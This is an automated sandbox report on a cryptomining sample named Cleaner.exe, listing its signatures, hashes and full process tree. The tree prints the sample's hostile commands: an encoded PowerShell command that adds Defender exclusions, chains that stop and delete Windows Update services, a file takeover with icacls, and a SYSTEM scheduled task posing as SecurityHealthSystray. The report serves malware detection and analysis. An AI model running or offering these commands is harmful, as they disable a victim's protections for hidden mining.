Analysis
-
max time kernel
150s -
max time network
113s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
22-04-2022 11:08
General
-
Target
Cleaner.exe
-
Size
2.3MB
-
MD5
20e46ebb79a42cf493dd3ad6129ba5ee
-
SHA1
84adc64bf4f3e7d886d6502292b23d57d26f8272
-
SHA256
28432c6b761d9a0d6d3a80cbeda9b6f745cf55b5a2c234737afe493d1ff11158
-
SHA512
4944f8a8f3eeb4321f59e295946724aab209ea42189a754334d0e10b88a8a5fe0842ec1e05f54fba874808305d9f11c8495fe776800dc8dd750389194ab3d7c8
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner Payload 12 IoCs
-
Executes dropped EXE 1 IoCs
-
Possible privilege escalation attempt 4 IoCs
-
Stops running service(s) 3 TTPs
-
Deletes itself 1 IoCs
-
Loads dropped DLL 1 IoCs
-
Modifies file permissions 1 TTPs 4 IoCs
-
Drops file in System32 directory 2 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry key 1 TTPs 18 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 16 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Cleaner.exe"C:\Users\Admin\AppData\Local\Temp\Cleaner.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Cleaner.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAZAB3AHEAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB5AHIAZgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBhAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBmAGIAZgAjAD4A"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHEAZAB3AHEAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB5AHIAZgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBhAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBmAGIAZgAjAD4A"4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
-
C:\Windows\system32\sc.exesc stop bits4⤵
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SecurityHealthSystray" /tr "C:\Users\Admin\AppData\Roaming\Windows\System32\Cleaner.exe"3⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SecurityHealthSystray" /tr "C:\Users\Admin\AppData\Roaming\Windows\System32\Cleaner.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\Windows\System32\Cleaner.exe"3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Windows\System32\Cleaner.exeC:\Users\Admin\AppData\Roaming\Windows\System32\Cleaner.exe4⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\Windows\System32\Cleaner.exe"5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAZAB3AHEAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB5AHIAZgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBhAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBmAGIAZgAjAD4A"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHEAZAB3AHEAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB5AHIAZgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBhAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBmAGIAZgAjAD4A"7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE6⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc7⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc7⤵
-
C:\Windows\system32\sc.exesc stop wuauserv7⤵
-
C:\Windows\system32\sc.exesc stop bits7⤵
-
C:\Windows\system32\sc.exesc stop dosvc7⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f7⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll7⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q7⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f7⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 06⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe6⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "epcmpvnpiunpa"7⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe xzvphebacekdz0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRha9S4YJkR8/KlqFio/vzAYZEBsbMhk19a7AHFG2E7AXG5//UQVzJkccaeoWplfhmCHOrnq1Le+Vt2hLfmUAFQRfoC5dvds9Gt24iuOewHBL7g5tJtx86xGis1I1eWetrS1UHEkH+vrl6JkY6mfHvSG+NZlsqE41I/gxXtQ1WF16okVXv+GWtJ2jTDeftRE44gOPA+n6owb2xJSg+OVDDzC6DaoQSzVVtZbIjxPjEYItfRVznwFjYJ9BGc8o4bMNfvs2nclQ0fY4vwCLx/SlGKnP6URkLeXto1CdhFuSOVYRl/tphD6T0pI/mzY6U5KEsLJJkp2mykiCbj4hO5UdOqFozjOsPdUAuU06yGivwBO6gHRjvCcku/wRQpaMqoxRTe6au1fPp/evBwE0HYfg7lU6yyI9zd2ajyvhhZisR9l4+vAszcHeXS/qP4y3oM5VnDPwVDp/CyMBRvjgVAgoUXvMebSmk5Wyrluq7uXI1Sa4IPk+fRpXLAFiY5zYDr8hQlFLkCd5JBxDb6zlYGH40nyQw08UctR9chPrnhDG693PwYkMgqGseP4pyATbMGwWJsCcp433Pu7FaeAiH0U/hD8kpmZEAptUQnHw25JKW69/54YVWzrKhh08fbGBaer570NvHB4Jp98gYpRgumwJa92nlPYJqhzOi+oIUQZsGjOfjNzapVCVrVzO5MT0kN7trILm/BZDE/s/YFPHWT5uIzJdsro1AS3lTGPgYnaA8zqPH4hIxrTcvplH/yyfoBprriqWxuMCuSQcTwVAS1g+b93HBm2ByunRexjY/gkVeeQu7hux2u0PXPewjS9IKPs78279HqfjH58sJpgPLcAOh42Gx3HIoOE07vDhMxN0nGffEVF3GGHPCwz/df8hq8bso1smI9NVabPKgTO9dCPE+9vpzTUEo/FaNPVbjy4zCoEV8QsX0CeJSrhahD3chkEjbPp9/+zR/Gq2lrSRnxxNg68Bl/6GZtMyVBKk6meLuEcNAf+Nls3mBvH4l/qZgBC0JxvZI7N8cz6USh4mOKPExVhDtSdWgZgcCfMPdhKl5c5wRAXJtp1GFgEh9MFStHJTIaAJN4YfCbgeB1p149ExzIP1gb1JKjPNDY5g4pYPcfoIGEL8jeGxAdqcmLi5/XhEa0v6i/Rw5QrG8HlNbV0InjbsYMkV+SyPE6goZkY2O/rBbtisO97QjEw10xtQSZg1qNlWEon5DviuoHteW9KJb19z8rdt5iCGJVz/rqtxX9ateYzYgiR4KsbFBG1gAWJX1vsMJ6yYw99k9AHiPOFh6npo3wxuxIvKTknQV2/wL/I/MpFXaQvyn1Qz7Vh16WlbYpDUYUNzMXWuR9Y4J6LS3s5B3Aw37zh8SxxZC3R2NM4WTYvm7K1Nonj5uya7IFGCSUCcPv82aKfX9L3brmDYl7chFgFTTMkByqhPyuIp9KCKS1FcazlxMH24uaTUxNGauXiLU+Pozfee70MINEfjFkRjBYI7pPg+/A7BWM7CtgqW2fuZ29prcbAjDK09peVUZK8baQtLF9Hl0PaT7VEO6ZSB1EPeuKkfKAXSsxULgkd7eQULVu9scBhmSwm1ba3FPjyL0oz2QhWaeoiEWajp16veapAryIqf0zp03j/B9xZQumt7VWzlj/q8rjWyzW7MYqwC1XKUoTP2mgy92WKQ3z01Ku5zGNrwxT8pn7RfjnwxIarMlYJY1tK6/m1GMtlmZYs96X5UaRq+hTvCe0nj16DNGiJEfo09oJ7XhuB020fcrcMJmR0/IAGYlvtytWt2AMBuvCvkNYkNg6jCTX6NTfd0bDk1ZEdMoXTWpMoqRihW6prngLejOTlUV8PKNzTl+gbFZ4yZWvKby4t91WHKS76⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Cleaner.exe"3⤵
- Deletes itself
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5d30ad7ca5d4270d968abf8fa3dd91676
SHA1a55873d6fc55d736bb9d76bd12a1d6133d672364
SHA256436960d6559ad197bb12ee54f8413ac6ff8ce2e3d17efb2b858acde17d3736f5
SHA5129486039bb88d01806f53cfe413ac49f1120881414bbb0cb810b3b8555baef66176e73dc87ef8b4e8b293714d4cfd739121b67ab20647a3317244ca4fdae3306e
-
C:\Users\Admin\AppData\Roaming\Windows\System32\Cleaner.exeFilesize
2.3MB
MD520e46ebb79a42cf493dd3ad6129ba5ee
SHA184adc64bf4f3e7d886d6502292b23d57d26f8272
SHA25628432c6b761d9a0d6d3a80cbeda9b6f745cf55b5a2c234737afe493d1ff11158
SHA5124944f8a8f3eeb4321f59e295946724aab209ea42189a754334d0e10b88a8a5fe0842ec1e05f54fba874808305d9f11c8495fe776800dc8dd750389194ab3d7c8
-
C:\Users\Admin\AppData\Roaming\Windows\System32\Cleaner.exeFilesize
2.3MB
MD520e46ebb79a42cf493dd3ad6129ba5ee
SHA184adc64bf4f3e7d886d6502292b23d57d26f8272
SHA25628432c6b761d9a0d6d3a80cbeda9b6f745cf55b5a2c234737afe493d1ff11158
SHA5124944f8a8f3eeb4321f59e295946724aab209ea42189a754334d0e10b88a8a5fe0842ec1e05f54fba874808305d9f11c8495fe776800dc8dd750389194ab3d7c8
-
\Users\Admin\AppData\Roaming\Windows\System32\Cleaner.exeFilesize
2.3MB
MD520e46ebb79a42cf493dd3ad6129ba5ee
SHA184adc64bf4f3e7d886d6502292b23d57d26f8272
SHA25628432c6b761d9a0d6d3a80cbeda9b6f745cf55b5a2c234737afe493d1ff11158
SHA5124944f8a8f3eeb4321f59e295946724aab209ea42189a754334d0e10b88a8a5fe0842ec1e05f54fba874808305d9f11c8495fe776800dc8dd750389194ab3d7c8
-
memory/108-112-0x0000000000000000-mapping.dmp
-
memory/304-86-0x0000000000000000-mapping.dmp
-
memory/308-143-0x0000000000000000-mapping.dmp
-
memory/428-67-0x0000000000000000-mapping.dmp
-
memory/604-102-0x0000000000000000-mapping.dmp
-
memory/672-93-0x0000000000000000-mapping.dmp
-
memory/672-123-0x0000000000000000-mapping.dmp
-
memory/820-148-0x0000000140000000-0x0000000140802000-memory.dmpFilesize
8.0MB
-
memory/820-169-0x0000000140000000-0x0000000140802000-memory.dmpFilesize
8.0MB
-
memory/820-146-0x0000000140000000-0x0000000140802000-memory.dmpFilesize
8.0MB
-
memory/820-158-0x0000000140000000-0x0000000140802000-memory.dmpFilesize
8.0MB
-
memory/820-163-0x0000000140000000-0x0000000140802000-memory.dmpFilesize
8.0MB
-
memory/820-161-0x0000000140000000-0x0000000140802000-memory.dmpFilesize
8.0MB
-
memory/820-145-0x0000000140000000-0x0000000140802000-memory.dmpFilesize
8.0MB
-
memory/820-165-0x0000000140000000-0x0000000140802000-memory.dmpFilesize
8.0MB
-
memory/820-167-0x0000000140000000-0x0000000140802000-memory.dmpFilesize
8.0MB
-
memory/820-164-0x0000000140000000-0x0000000140802000-memory.dmpFilesize
8.0MB
-
memory/820-151-0x0000000140000000-0x0000000140802000-memory.dmpFilesize
8.0MB
-
memory/820-170-0x00000000000E0000-0x0000000000100000-memory.dmpFilesize
128KB
-
memory/820-159-0x0000000140000000-0x0000000140802000-memory.dmpFilesize
8.0MB
-
memory/820-154-0x0000000140000000-0x0000000140802000-memory.dmpFilesize
8.0MB
-
memory/820-171-0x0000000140000000-0x0000000140802000-memory.dmpFilesize
8.0MB
-
memory/820-157-0x0000000140000000-0x0000000140802000-memory.dmpFilesize
8.0MB
-
memory/820-172-0x0000000000000000-0x0000000001000000-memory.dmpFilesize
16.0MB
-
memory/824-84-0x0000000000000000-mapping.dmp
-
memory/824-114-0x0000000000000000-mapping.dmp
-
memory/840-79-0x0000000000000000-mapping.dmp
-
memory/860-77-0x0000000000000000-mapping.dmp
-
memory/964-76-0x0000000000000000-mapping.dmp
-
memory/972-98-0x0000000000000000-mapping.dmp
-
memory/976-127-0x0000000002230000-0x0000000002236000-memory.dmpFilesize
24KB
-
memory/1000-125-0x0000000000000000-mapping.dmp
-
memory/1008-70-0x0000000000000000-mapping.dmp
-
memory/1032-118-0x0000000000000000-mapping.dmp
-
memory/1032-89-0x0000000000000000-mapping.dmp
-
memory/1076-64-0x0000000000000000-mapping.dmp
-
memory/1080-80-0x0000000000000000-mapping.dmp
-
memory/1124-90-0x0000000000000000-mapping.dmp
-
memory/1148-83-0x0000000000000000-mapping.dmp
-
memory/1152-69-0x0000000000000000-mapping.dmp
-
memory/1156-65-0x0000000000000000-mapping.dmp
-
memory/1156-128-0x0000000000000000-mapping.dmp
-
memory/1168-121-0x0000000000000000-mapping.dmp
-
memory/1200-99-0x0000000000000000-mapping.dmp
-
memory/1204-81-0x0000000000000000-mapping.dmp
-
memory/1224-66-0x0000000000000000-mapping.dmp
-
memory/1292-73-0x0000000000000000-mapping.dmp
-
memory/1328-142-0x0000000000000000-mapping.dmp
-
memory/1336-139-0x0000000000000000-mapping.dmp
-
memory/1444-78-0x0000000000000000-mapping.dmp
-
memory/1448-72-0x0000000000000000-mapping.dmp
-
memory/1532-87-0x0000000000000000-mapping.dmp
-
memory/1536-88-0x0000000000000000-mapping.dmp
-
memory/1536-117-0x0000000000000000-mapping.dmp
-
memory/1544-85-0x0000000000000000-mapping.dmp
-
memory/1548-113-0x0000000000000000-mapping.dmp
-
memory/1604-71-0x0000000000000000-mapping.dmp
-
memory/1632-57-0x0000000000000000-mapping.dmp
-
memory/1688-74-0x0000000000000000-mapping.dmp
-
memory/1692-107-0x00000000026D4000-0x00000000026D7000-memory.dmpFilesize
12KB
-
memory/1692-108-0x000000001B7F0000-0x000000001BAEF000-memory.dmpFilesize
3.0MB
-
memory/1692-109-0x00000000026DB000-0x00000000026FA000-memory.dmpFilesize
124KB
-
memory/1692-106-0x000007FEECC50000-0x000007FEED7AD000-memory.dmpFilesize
11.4MB
-
memory/1692-103-0x0000000000000000-mapping.dmp
-
memory/1704-110-0x0000000000000000-mapping.dmp
-
memory/1724-126-0x0000000000000000-mapping.dmp
-
memory/1732-140-0x0000000000000000-mapping.dmp
-
memory/1740-115-0x0000000000000000-mapping.dmp
-
memory/1760-96-0x0000000000000000-mapping.dmp
-
memory/1796-153-0x0000000001C40000-0x0000000001C46000-memory.dmpFilesize
24KB
-
memory/1796-149-0x0000000000060000-0x0000000000067000-memory.dmpFilesize
28KB
-
memory/1804-82-0x0000000000000000-mapping.dmp
-
memory/1840-116-0x0000000000000000-mapping.dmp
-
memory/1852-92-0x0000000000000000-mapping.dmp
-
memory/1860-68-0x0000000000000000-mapping.dmp
-
memory/1860-144-0x0000000000000000-mapping.dmp
-
memory/1876-111-0x0000000000000000-mapping.dmp
-
memory/1884-56-0x000007FEFBE51000-0x000007FEFBE53000-memory.dmpFilesize
8KB
-
memory/1884-55-0x000000001B2D0000-0x000000001B520000-memory.dmpFilesize
2.3MB
-
memory/1884-54-0x0000000000210000-0x0000000000461000-memory.dmpFilesize
2.3MB
-
memory/1888-75-0x0000000000000000-mapping.dmp
-
memory/1952-95-0x0000000000000000-mapping.dmp
-
memory/1960-124-0x0000000000000000-mapping.dmp
-
memory/1964-91-0x0000000000000000-mapping.dmp
-
memory/1972-94-0x0000000000000000-mapping.dmp
-
